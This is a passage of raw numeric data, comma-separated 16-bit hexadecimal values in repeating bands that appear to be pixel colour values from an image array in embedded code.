0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 